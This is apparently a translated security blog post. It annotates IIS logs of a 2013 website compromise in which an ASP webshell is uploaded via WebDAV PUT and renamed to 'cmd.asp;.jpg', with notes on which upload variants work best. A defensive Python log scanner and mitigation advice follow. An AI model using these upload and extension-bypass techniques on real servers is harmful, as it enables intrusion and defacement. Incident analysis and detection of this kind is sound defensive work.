In Southeast Asia there is a hacker called Hmei7 who claims to belong to Anonymous and has compromised a very large number of websites. His technique, however, amounts to nothing more than IIS PUT and brute-forcing Joomla admin panels.
Below are the logs of a compromised site captured by 习科 (Silic), with annotations added:
2013-01-06 14:42:40 PUT /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 201 0 0
#### The IP starting with 93 is most likely a proxy running something along the lines of Nessus, or a script; it looks like a .NET program.
2013-01-06 14:42:49 PUT /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0
#### 201 is Created, meaning the file was created successfully. Look straight at the third request for x.txt: the GET returns 200, which confirms the creation succeeded.
2013-01-06 14:42:49 GET /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0
#### The first GET is the program's automatic confirmation; the second one is probably manual.
2013-01-06 14:43:06 GET /x.txt - 80 - 69.42.222.15 Mozilla/5.0+(compatible;+MSIE+9.0;+Windows+NT+6.0;+Trident/5.0) 200 0 0
#### 69.42.222.15, the US IP, is a proxy; the Malaysian IP 118.100.232.48 is the real one.
2013-01-06 14:45:27 PUT /byHmei7.txt - 80 - 118.100.232.48 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/5.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C) 201 0 0
#### The webshell is named as a .txt and PUT onto the server.
2013-01-06 14:45:27 MOVE /byHmei7.txt - 80 - 118.100.232.48 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+Trident/5.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C) 201 0 0
#### Normally a file with an .asp extension cannot be PUT directly, so it is PUT as .txt and then COPYed or MOVEd to .asp; the PUT with the highest success rate is to PUT a .txt and then COPY it to a file with an `.asa;` suffix.
#### Of course, directly PUTting an `asa;.txt` also succeeds some of the time; I will not go through every variation here.
Continuing with the log:
2013-01-06 16:01:48 PUT /byHmei7.txt - 80 - 78.161.121.24 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022;+.NET4.0C;+.NET4.0E) 201 0 0
2013-01-06 16:01:48 MOVE /byHmei7.txt - 80 - 78.161.121.24 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+Trident/4.0;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022;+.NET4.0C;+.NET4.0E) 201 0 0
2013-01-06 16:02:41 GET /cmd.asp;.jpg - 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
2013-01-06 16:04:17 GET /cmd.asp;.jpg raiz=D:\wwwroot 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
2013-01-06 16:05:31 GET /cmd.asp;.jpg raiz=D:\wwwroot\web 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
2013-01-06 16:05:40 GET /cmd.asp;.jpg action=mass&massact=dfc&path=D:|wwwroot| 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
2013-01-06 16:05:51 POST /cmd.asp;.jpg action=mass&massact=dfc 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
2013-01-06 16:06:03 GET /cmd.asp;.jpg raiz=D: 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 121
2013-01-06 16:07:10 GET /cmd.asp;.jpg action=mass&massact=dfc&path=D:|wwwroot|crystalstar| 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.11+(KHTML,+like+Gecko)+Chrome/23.0.1271.97+Safari/537.11 200 0 0
First a full-featured ASP webshell is PUT as byHmei7.txt, then MOVEd to cmd.asp;.jpg. The program Hmei7 uses on 78.161.121.24 to perform the PUT is probably a C#/.NET program.
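The two things a defender would want to pull out of logs like these are WebDAV write verbs (PUT/MOVE/COPY) that the server actually accepted, and requests for paths such as `cmd.asp;.jpg` where an executable extension is followed by a semicolon. The following scanner is an added example, not code from the post or from 习科; it assumes the IIS W3C field order visible in the quoted lines (date, time, method, uri-stem, uri-query, port, username, client IP, user agent, status, substatus, win32-status) and the sample log it runs on is constructed to mirror those lines, with one benign request added.

```python
"""Scan IIS W3C extended log lines for accepted WebDAV writes and the
`name.asp;.jpg` semicolon-extension trick described in the post.

Assumed field layout (matches the quoted log lines):
date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip
cs(User-Agent) sc-status sc-substatus sc-win32-status
"""
import re
from collections import defaultdict

# WebDAV verbs that create, rename or copy content on the server.
WRITE_VERBS = {"PUT", "MOVE", "COPY", "MKCOL", "DELETE", "PROPPATCH"}

# IIS 6 executes "cmd.asp;.jpg" as cmd.asp: flag any URI where an
# executable extension is immediately followed by a semicolon.
SEMICOLON_EXT = re.compile(r"\.(asp|asa|aspx|cer|cdx|php|jsp)\s*;", re.IGNORECASE)

# Constructed sample log, modelled on the lines quoted in the post
# (user agents shortened; IIS logs spaces in the UA field as '+').
SAMPLE_LOG = """\
2013-01-06 14:42:40 PUT /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0) 201 0 0
2013-01-06 14:42:49 GET /x.txt - 80 - 93.91.195.233 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2013-01-06 14:45:27 PUT /byHmei7.txt - 80 - 118.100.232.48 Mozilla/4.0+(compatible;+MSIE+7.0) 201 0 0
2013-01-06 14:45:27 MOVE /byHmei7.txt - 80 - 118.100.232.48 Mozilla/4.0+(compatible;+MSIE+7.0) 201 0 0
2013-01-06 16:02:41 GET /cmd.asp;.jpg - 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1) 200 0 0
2013-01-06 16:05:51 POST /cmd.asp;.jpg action=mass&massact=dfc 80 - 78.161.121.24 Mozilla/5.0+(Windows+NT+5.1) 200 0 0
2013-01-06 16:10:00 GET /index.html - 80 - 10.0.0.5 Mozilla/5.0 200 0 0
"""


def parse_line(line):
    """Split one W3C line into a dict; return None for blank, comment or short lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 12:
        return None
    return {
        "date": parts[0], "time": parts[1], "method": parts[2],
        "uri": parts[3], "query": parts[4], "port": parts[5],
        "user": parts[6], "ip": parts[7], "ua": parts[8],
        "status": int(parts[9]), "substatus": parts[10], "win32": parts[11],
    }


def classify(rec):
    """Return the alert tags that apply to a parsed record (empty if benign)."""
    tags = []
    if rec["method"] in WRITE_VERBS:
        # 201 Created or 200 OK on a write verb means the server accepted it;
        # anything else is still worth seeing as an attempt.
        tags.append("webdav-write-accepted" if rec["status"] in (200, 201)
                    else "webdav-write-attempt")
    if SEMICOLON_EXT.search(rec["uri"]):
        tags.append("semicolon-extension")
    return tags


def scan(log_text):
    """Yield (record, tags) for every line that triggers at least one tag."""
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            yield rec, tags


def summarize_by_ip(log_text):
    """Group alert tags by client IP, so the proxy-to-real-IP pivot stands out."""
    summary = defaultdict(set)
    for rec, tags in scan(log_text):
        summary[rec["ip"]].update(tags)
    return {ip: sorted(t) for ip, t in summary.items()}


if __name__ == "__main__":
    for rec, tags in scan(SAMPLE_LOG):
        print(f'{rec["time"]} {rec["ip"]:>16} {rec["method"]:<5} '
              f'{rec["uri"]:<16} {rec["status"]} {",".join(tags)}')
    print(summarize_by_ip(SAMPLE_LOG))
```

On the sample input the per-IP summary shows the two PUT sources as `webdav-write-accepted` and 78.161.121.24 as `semicolon-extension`, while the benign GET for index.html is not reported at all. Running the same scan over a real log file is a matter of reading it into `scan()`; the immediate fix on the server side is to disable WebDAV (or at least the PUT/MOVE/COPY verbs) for anonymous users and to remove script-mapping for the `.asa`/`.cer`/`.cdx` extensions that are not in use.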